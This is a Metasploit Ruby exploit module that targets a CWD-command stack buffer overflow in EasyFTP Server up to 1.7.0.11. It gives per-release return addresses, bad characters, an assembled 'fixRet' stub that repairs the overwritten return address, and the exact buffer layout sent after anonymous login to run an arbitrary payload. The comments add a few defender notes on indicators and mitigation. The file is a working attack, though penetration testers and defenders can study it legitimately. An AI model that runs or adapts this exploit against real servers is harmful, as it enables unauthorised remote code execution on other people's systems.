##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Ftp

  # Declares module metadata: the affected product and releases, authorship,
  # references, payload constraints (size and bad characters) and one absolute
  # return address per affected EasyFTP release (used by +exploit+ as target.ret).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
          and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which
          leads to a stack based buffer overflow. EasyFTP allows anonymous access by
          default; valid credentials are typically unnecessary to exploit this vulnerability.

          After version 1.7.0.12, this package was renamed "UplusFtp".

          This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.
          This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by
          'fixing' the return address post-exploitation. See references for more information.
      },
      'Author'         =>
        [
          'Paul Makowski <my.hndl[at]gmail.com>', # original version
          'jduck' # various fixes, remove most hardcoded addresses
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'OSVDB', '62134' ],
          [ 'URL', 'http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/' ],
          [ 'URL', 'http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit' ],
          [ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ],
          [ 'URL', 'http://code.google.com/p/easyftpsvr/'],
          [ 'URL', 'https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip' ],
          [ 'URL', 'http://www.securityfocus.com/bid/38262/exploit']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          # Total bytes able to write without crashing program (505) - length of fixRet (25) - slack space (30) = 450
          'Space'       => 505 - 30 - 25,
          'BadChars'    => "\x00\x0a\x2f\x5c", # from: http://downloads.securityfocus.com/vulnerabilities/exploits/38262-1.py
          # No framework NOP padding: +exploit+ lays the buffer out at fixed offsets itself
          'DisableNops' => true
        },
      'Platform'       => 'win',
      # Absolute 'call edi' addresses inside ftpbasicsvr.exe. They differ between
      # releases, so every affected release is its own target entry.
      'Targets'        =>
        [
          [ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x00404111 } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x004043ca } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x0040438a } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe
          [ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe
        ],
      'DisclosureDate' => 'Feb 16 2010',
      'DefaultTarget'  => 0))
  end

  # Banner-based vulnerability check.
  #
  # Opens and closes the control connection, then looks for 'BigFoolCat' in the
  # banner (presumably captured by the Ftp mixin during connect - confirm).
  # Only the product is recognised, not its version: Safe here means "banner
  # did not match", not "host is patched".
  #
  # @return [Exploit::CheckCode] Vulnerable when the banner matches, Safe otherwise
  def check
    connect
    disconnect

    if (banner =~ /BigFoolCat/) # EasyFTP Server has undergone several name changes
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  # Builds the overflowing CWD argument and sends it over the control connection.
  #
  # Buffer layout (byte offsets):
  #   0..24    fixRet stub assembled from fixRet_asm
  #   25..31   NOP padding up to 0x20
  #   32..     payload.encoded (at most 'Space' = 450 bytes, so the whole
  #            buffer is at most 482 bytes)
  #   268..271 overwritten with target.ret; the four payload bytes displaced
  #            from there are copied into the stub's 0xdeadbeef immediate
  #            (buf[1,4]) so the stub can write them back at run time.
  #
  # Defender notes, derived from this layout: the wire-level indicator is a
  # single CWD command whose argument is several hundred bytes long and
  # contains non-printable bytes; a server-side length check on the CWD
  # argument, or upgrading beyond the releases listed in Targets
  # (1.7.0.11 is the last one named as affected), removes the condition.
  def exploit
    # Uses the module's FTP credentials; per the description anonymous access
    # is enabled by default on the affected releases.
    connect_login

    # If the payload's length is larger than 233 bytes then the payload must be bisected with the return address and later patched.
    # Explanation of technique: http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/

    # NOTE:
    # This exploit jumps to edi, which happens to point at a partial version of
    # the 'buf' string in memory. The fixRet below fixes up the code stored on the
    # stack and then jumps there to execute the payload. The value in esp is used
    # with an offset for the fixup.
    #
    # 0xdeadbeef is a placeholder: 'mov ecx, imm32' encodes as one opcode byte
    # followed by the immediate, so buf[1,4] below patches the real bytes in.
    # The two large constants wrap in 32-bit arithmetic:
    #   sub edi, 0xfffffe14  ->  edi = esp + 0x1ec   (restore location)
    #   add edi, 0xffffff14  ->  edi = edi - 0xec    (= esp + 0x100, jump target)
    fixRet_asm = %q{
      mov ecx, 0xdeadbeef
      mov edi, esp
      sub edi, 0xfffffe14
      mov [edi], ecx
      add edi, 0xffffff14
      jmp edi
    }
    fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string

    buf = ''

    print_status("Prepending fixRet...")
    buf << fixRet
    # Pad the stub out to a fixed 0x20 bytes so the payload always starts at offset 32
    buf << make_nops(0x20 - buf.length)
    #buf << "C" * (0x20 - buf.length)

    print_status("Adding the payload...")
    buf << payload.encoded

    # Backup the original return address bytes
    # (copied into the stub's imm32 at offset 1; buf[268,4] is nil if the
    # buffer is shorter than 272 bytes, which this assignment would reject)
    buf[1,4] = buf[268,4]

    print_status("Overwriting part of the payload with target address...")
    buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes

    # NOTE: SEH head at offset 256 also gets smashed. That is, it becomes what is at fs:[0] ..

    print_status("Sending exploit buffer...")
    # Second argument presumably controls whether a reply is awaited - confirm against the Ftp mixin
    send_cmd( ['CWD', buf] , false) # this will automatically put a space between 'CWD' and our attack string

    # Hand off to the payload handler, then close the control connection
    handler
    disconnect
  end

end